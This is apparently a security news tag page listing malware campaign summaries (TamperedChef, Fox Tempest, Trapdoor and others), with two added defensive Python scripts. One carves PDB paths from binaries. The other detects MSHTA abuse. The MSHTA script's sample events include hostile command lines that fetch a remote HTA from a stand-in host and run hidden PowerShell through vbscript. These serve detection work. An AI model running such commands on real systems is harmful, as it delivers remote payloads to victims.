Tag: malware
-
TamperedChef Malware Hides in Signed Apps to Drop Stealers and RATs
A large-scale malware campaign dubbed “TamperedChef” is leveraging trojanized productivity applications such as PDF editors, calendar tools, and file converters to silently deploy information stealers and remote access trojans (RATs), according to recent threat intelligence findings. Security researchers have identified multiple activity clusters linked to this evolving threat, including CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110. While these…
-
BadIIS Malware Hijacks IIS Servers to Redirect Users to Illicit Sites
Talos has analyzed a new variant of the BadIIS malware that hijacks Microsoft IIS web servers to redirect users to illicit websites, highlighting an evolving malware-as-a-service (MaaS) ecosystem operated by Chinese-speaking cybercrime groups. The newly analyzed variant is marked by embedded “demo.pdb” strings, which Talos used to trace its development history. Evidence suggests the malware has been actively…
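The “demo.pdb” pivot mentioned above is the kind of artifact an analyst can carve from a binary without a full PE parser. The Python below is an added example, not Talos’s tooling and not bytes from any BadIIS sample: it scans a buffer for CodeView debug records in both the RSDS (CodeView 7.0) and older NB10 layouts, extracts the PDB path, GUID/timestamp and age, and matches path basenames against a hunting watchlist. SAMPLE_PE is a constructed stand-in for a PE image, and the watchlist entry “demo.pdb” is used only to illustrate the pivot.

```python
import re
import struct
import uuid
from typing import Optional

# Constructed stand-in for a PE image: filler bytes around one RSDS (CodeView 7.0)
# record and one NB10 (CodeView 2.0) record. Not bytes from any real sample.
_FAKE_GUID = bytes(range(16))
SAMPLE_PE = (
    b"MZ" + b"\x00" * 62
    + b"RSDS" + _FAKE_GUID + struct.pack("<I", 3)          # signature, GUID, age
    + b"D:\\work\\demo\\x64\\Release\\demo.pdb\x00"        # NUL-terminated path
    + b"\x00" * 16
    + b"NB10" + struct.pack("<III", 0, 0x5F3E1A2B, 1)      # signature, offset, timestamp, age
    + b"c:\\legacy\\module.pdb\x00"
    + b"\x00" * 8
)

_SIG = re.compile(rb"RSDS|NB10")


def _cstring(data: bytes, off: int, limit: int = 1024) -> Optional[str]:
    """Printable ASCII NUL-terminated string starting at off, or None if absent/garbage."""
    end = data.find(b"\x00", off, off + limit)
    if end <= off:
        return None
    raw = data[off:end]
    if any(b < 0x20 or b > 0x7E for b in raw):
        return None
    return raw.decode("ascii")


def find_pdb_records(data: bytes) -> list:
    """Carve CodeView debug records; requiring a .pdb suffix filters random signature hits."""
    records = []
    for m in _SIG.finditer(data):
        off = m.end()
        if m.group() == b"RSDS":
            if off + 20 > len(data):            # need 16-byte GUID + 4-byte age
                continue
            guid = str(uuid.UUID(bytes_le=data[off:off + 16])).upper()
            age = struct.unpack_from("<I", data, off + 16)[0]
            path = _cstring(data, off + 20)
            if path and path.lower().endswith(".pdb"):
                records.append({"format": "RSDS", "guid": guid, "age": age, "path": path})
        else:
            if off + 12 > len(data):            # need offset + timestamp + age
                continue
            _offset, timestamp, age = struct.unpack_from("<III", data, off)
            path = _cstring(data, off + 12)
            if path and path.lower().endswith(".pdb"):
                records.append({"format": "NB10", "timestamp": timestamp, "age": age, "path": path})
    return records


def pdb_basename(path: str) -> str:
    """Last path component, tolerant of either separator, lower-cased for matching."""
    return re.split(r"[\\/]", path)[-1].lower()


def match_watchlist(records: list, watchlist: set) -> list:
    """Paths whose basename is on the watchlist (e.g. {"demo.pdb"} for the BadIIS pivot)."""
    return [r["path"] for r in records if pdb_basename(r["path"]) in watchlist]


if __name__ == "__main__":
    found = find_pdb_records(SAMPLE_PE)
    for rec in found:
        print(rec)
    print("watchlist hits:", match_watchlist(found, {"demo.pdb"}))
```

The scan works on cleartext bytes only, so a packed or encrypted sample has to be unpacked before the record is visible; and because a build can strip or forge the PDB path, a hit is a pivot for clustering, not proof of a shared author. The GUID and age pair is what a symbol server keys on, which makes it a useful second field to correlate across samples.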
-
WantToCry Ransomware Exploits SMB to Encrypt Remote Files
A new ransomware campaign named “WantToCry” leverages exposed Server Message Block (SMB) services to gain access and encrypt victim data without deploying traditional malware on the compromised systems. Because files are encrypted remotely over SMB rather than by a payload running on the victim host, this approach significantly reduces the detection surface, making it harder for conventional security tools to identify the attack. The name “WantToCry” appears to reference the infamous WannaCry…
-
Ukraine identifies infostealer operator tied to 28,000 stolen accounts
The Ukrainian cyberpolice, working in conjunction with U.S. law enforcement, has identified an 18-year-old man from Odesa suspected of running an infostealer malware operation targeting users of an online store in California. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ukraine-identifies-infostealer-operator-tied-to-28-000-stolen-accounts/
-
Microsoft Disrupts Malware-Signing Service Used by Ransomware Gangs
Microsoft disrupted the Fox Tempest operation after attackers abused Azure Artifact Signing to distribute malware disguised as trusted software. First seen on esecurityplanet.com Jump to article: www.esecurityplanet.com/threats/microsoft-disrupts-malware-signing-service-used-by-ransomware-gangs/
-
Microsoft disrupts cybercrime operation that hid behind legitimate software
The Fox Tempest malware-signing-as-a-service operation was linked to numerous ransomware attacks. First seen on cybersecuritydive.com Jump to article: www.cybersecuritydive.com/news/microsoft-disrupts-cybercrime-hid-legitimate-software/820724/
-
Android Malware Campaign Used Hundreds of Fake Apps to Silently Charge Users
The Premium Deception campaign uses 250 Android apps to silently sign victims up to paid services. First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/android-carrier-billing-fraud-four/
-
Microsoft Takes Down Malware-Signing Service Behind Ransomware Attacks
Microsoft on Tuesday said it disrupted a malware-signing-as-a-service (MSaaS) operation that weaponized the company’s Artifact Signing system to deliver malicious code and conduct ransomware and other attacks, compromising thousands of machines and networks across the world. The tech giant attributed the activity to a threat actor it calls Fox Tempest, which it said offered the MSaaS…
-
Gremlin Stealer Hides C2 and Exfiltration Paths in Encrypted Resources
A newly identified variant of the Gremlin stealer malware is leveraging advanced obfuscation techniques to conceal its command-and-control (C2) infrastructure and data exfiltration logic within encrypted .NET resource sections. This evolution highlights a significant shift toward stealth, modularity, and anti-analysis sophistication in modern infostealer campaigns. Its targets include browser-stored credentials, session tokens, cryptocurrency wallets, clipboard…
-
New Malware ‘TencShell’ Targets Corporate Networks and Supply Chains
Security researchers at Cato Networks have discovered a previously unknown backdoor that specifically targets enterprise environments. First seen on it-daily.net Jump to article: www.it-daily.net/it-sicherheit/cybercrime/malware-tencshell-unternehmensnetzwerke
-
GraphWorm Malware Abuses Microsoft OneDrive for Stealthy C2 Operations
New activity from Webworm, a China-aligned advanced persistent threat (APT) group, reveals a significant evolution in its cyber espionage toolkit during 2025. The group, first publicly documented in 2022, has shifted its targeting from primarily Asian organizations to government entities across Europe, while adopting stealthier techniques and cloud-based command-and-control (C2) infrastructure. One of the…
-
Fox Tempest Linked to Malware-Signing Service Abusing Microsoft Artifact Signing
Fox Tempest, a financially motivated threat actor, has been linked to a large-scale malware-signing-as-a-service (MSaaS) operation that abused Microsoft’s Artifact Signing platform to enable cybercriminals to distribute malicious software that appeared to be trusted. According to Microsoft Threat Intelligence, the group enabled ransomware campaigns and malware distribution by generating fraudulent but valid code-signing certificates, allowing…
-
Fake Tax Assessment Pages Spread Windows Malware
Hackers are actively targeting Windows users with fake Indian Income Tax assessment pages in a campaign tracked as TAX#TRIDENT. The campaign begins with fraudulent tax assessment or penalty pages designed to create urgency. Victims are prompted to download what appears to be an official document, often packaged as a ZIP archive. Once opened, the archive…
-
Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks
Banana RAT malware hidden in fake invoices and security update screens targets customers at 16 Brazilian banks stealing data with QR fraud. First seen on hackread.com Jump to article: hackread.com/banana-rat-malware-fake-invoices-16-brazilian-banks/
-
Trapdoor Android Ad Fraud Ring Abuses 455 Apps for Fake Clicks
Researchers have exposed a large-scale Android ad fraud campaign named “Trapdoor,” a sophisticated ecosystem built on 455 malicious apps and 183 command-and-control (C2) domains. The operation combines malvertising, automated click fraud, and advanced evasion techniques to create a self-sustaining revenue loop that has generated massive fraudulent traffic across the digital advertising ecosystem. At its peak, Trapdoor generated…
-
DevilNFC Malware Traps Android Users in NFC Relay Attacks
A newly identified Android malware family named DevilNFC is raising concern among cybersecurity researchers for its advanced use of kiosk mode to trap victims during NFC relay attacks. Together with NFCMultiPay, it marks a significant evolution in NFC relay threats: unlike earlier campaigns dominated by Chinese-speaking Malware-as-a-Service ecosystems, DevilNFC and NFCMultiPay are developed by independent regional…
-
Mini Shai-Hulud Attack Hits npm Ecosystem, Compromising Over 600 Packages
A large-scale supply chain attack targeting the npm ecosystem has resurfaced with a new variant of the Mini Shai-Hulud malware, compromising more than 600 packages and introducing advanced evasion techniques, including forged Sigstore provenance. The attack primarily targeted the widely used @antv ecosystem but quickly spread to other popular libraries and developer tools. The attack…
-
Hackers Exploit MSHTA to Deploy LummaStealer and Amatera Malware
Hackers are increasingly abusing the legacy Microsoft HTML Application Host (MSHTA) utility to deliver commodity malware such as LummaStealer and Amatera. Despite being tied to Internet Explorer, which was retired in 2022, MSHTA remains present by default in Windows, making it an attractive Living-off-the-Land binary (LOLBIN) for stealthy attacks. MSHTA allows execution of VBScript and JavaScript from…
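The abuse pattern described above (mshta.exe pulling an HTA from a remote URL, running script inline through a javascript:/vbscript: pseudo-URL, or launching an HTA dropped into a user-writable directory, often from an Office parent) is straightforward to hunt in process-creation telemetry. The Python below is an added example, not code from the page or from the researchers it cites: it scores constructed Sysmon Event ID 1 style records against those indicators. The field names (Image, CommandLine, ParentImage) follow Sysmon; the events and paths are constructed, not real telemetry from the LummaStealer or Amatera campaigns.

```python
import re

# Constructed Sysmon Event ID 1 style records; illustrative only, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe https://cdn.example.invalid/update.hta",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -w hidden"":close")',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\mshta.exe" "C:\Users\alice\AppData\Local\Temp\invoice.hta"',
     "ParentImage": r"C:\Users\alice\Downloads\invoice.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",   # plausible vendor installer: not flagged
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\Setup\wizard.hta"',
     "ParentImage": r"C:\Program Files\Vendor\Setup\setup.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",  # not mshta: ignored entirely
     "CommandLine": r"notepad.exe https://example.invalid/notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# HTA fetched over the network: no file ever has to land on disk
REMOTE_URL = re.compile(r"\bhttps?://", re.I)
# mshta executes script passed through these pseudo-URLs directly on the command line
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript|about):", re.I)
# .hta living where an unprivileged user (or a dropper running as one) can write
USER_WRITABLE_HTA = re.compile(
    r'\\(?:users\\[^\\"]+\\(?:appdata|downloads|desktop)|windows\\temp|programdata)\\[^"]*?\.hta\b',
    re.I)
# Office spawning mshta is a classic maldoc-to-LOLBIN chain
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the abuse indicators matched by one process-creation event (empty if benign)."""
    if _basename(event.get("Image", "")) != "mshta.exe":
        return []
    cmd = event.get("CommandLine", "")
    reasons = []
    if REMOTE_URL.search(cmd):
        reasons.append("remote_url")
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline_script")
    if USER_WRITABLE_HTA.search(cmd):
        reasons.append("user_writable_hta")
    if _basename(event.get("ParentImage", "")) in OFFICE_PARENTS:
        reasons.append("office_parent")
    return reasons


def scan(events: list) -> list:
    """(index, indicators) for every event that matched at least one rule."""
    hits = []
    for i, e in enumerate(events):
        reasons = classify(e)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

The fourth record shows why the rules key on where the HTA comes from rather than on mshta.exe itself: installers under Program Files still use HTAs legitimately, so alerting on every MSHTA launch buries the signal. If MSHTA is not needed in an environment, blocking it outright with an application-control policy removes the LOLBIN rather than detecting it after the fact.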
-
Android Ad Fraud Operation Generates 659M Bid Requests
Researchers Identify 455 Malicious Apps Tied to Global Malvertising Campaign. Cybercriminals used malicious Android apps to funnel unwitting users to an ad fraud scam that generated up to 659 million daily bid requests, reports Human Security. The scam has spanned 455 malicious Android apps and is linked to 183 threat actor-owned command-and-control domains. First seen…
-
Cybercrime service disrupted for abusing Microsoft platform to sign malware
Microsoft says it has disrupted a malware-signing-as-a-service (MSaaS) operation that abused the company’s Artifact Signing service to generate fraudulent code-signing certificates used by ransomware gangs and other cybercriminals. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/cybercrime-service-disrupted-for-abusing-microsoft-platform-to-sign-malware/
-
Mac Users Face New Malware Threat Spoofing Apple, Google, and Microsoft
A new SHub Reaper macOS infostealer spoofs prompts from Apple, Google, and Microsoft to steal passwords, crypto data, and business files from Macs. First seen on techrepublic.com Jump to article: www.techrepublic.com/article/news-reaper-shub-malware-mac-users/
-
Microsoft dismantled malware-signing network Fox Tempest
Microsoft disrupted Fox Tempest, a malware-signing-as-a-service (MSaaS) that allowed attackers to sign malware with fake trusted certificates. Microsoft said it disrupted a cybercrime operation run by a threat actor named Fox Tempest, which helped threat actors sign malware with short-lived certificates to make malicious software appear legitimate. The service abused Microsoft Artifact Signing and supported…
-
Trapdoor Android Ad Fraud Scheme Hit 659 Million Daily Bid Requests Using 455 Apps
Cybersecurity researchers have disclosed details of a new ad fraud and malvertising operation dubbed Trapdoor targeting Android device users. The activity, per HUMAN’s Satori Threat Intelligence and Research Team, encompassed 455 malicious Android apps and 183 threat actor-owned command-and-control (C2) domains, turning the infrastructure into a pipeline for multi-stage fraud. ”Users First seen on thehackernews.com Jump to…

